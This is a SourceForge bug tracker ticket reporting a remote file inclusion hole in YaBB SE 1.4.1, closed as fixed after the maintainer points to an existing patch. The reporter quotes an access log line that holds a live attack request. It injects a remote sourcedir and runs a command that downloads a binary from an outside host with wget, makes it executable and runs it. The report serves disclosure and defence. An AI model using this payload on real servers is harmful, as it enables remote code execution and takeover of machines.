#182 1.4 Security Hole (Major)

closed-fixed
nobody
None
9
2003-05-09
2003-05-08
No

Take a look at this log exert

200.149.93.179 - - [28/Apr/2003:02:16:01
+0100] "GET /yabbse/Sources/Packages.php?
sourcedir=http://www.unamea2002.hpg.ig
.com.br/app.txt?&cmd=cd%20/tmp;wget%
20http://www.r00tshell.hpg.com.br/.bash/cgi;chmod%
20+x%20cgi;./cgi HTTP/1.1" 200 690
"-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"

What does that say to you! Whats more is it worked!

if my firewall wasn't as tight as a duck's arse they would
have had access to the machine as well

Discussion

  • Ashley Berlin

    Ashley Berlin - 2003-05-08
    • priority: 5 --> 9
     
  • Ashley Berlin

    Ashley Berlin - 2003-05-08

    Logged In: YES
    user_id=532359

    Just to clairfy v.1.4.1

     
  • Unknown W. Brackets

    Logged In: YES
    user_id=633762

    We've already released the patch.... and tried to publicize it.

    Please check yabbse.org every few months, or register and
    turn announcement emails on.

    -[Unknown]

     
  • Unknown W. Brackets

    • status: open --> closed-fixed
     

Log in to post a comment.

Get latest updates about Open Source Projects, Conferences and News.

Sign up for the SourceForge newsletter:

JavaScript is required for this form.





No, thanks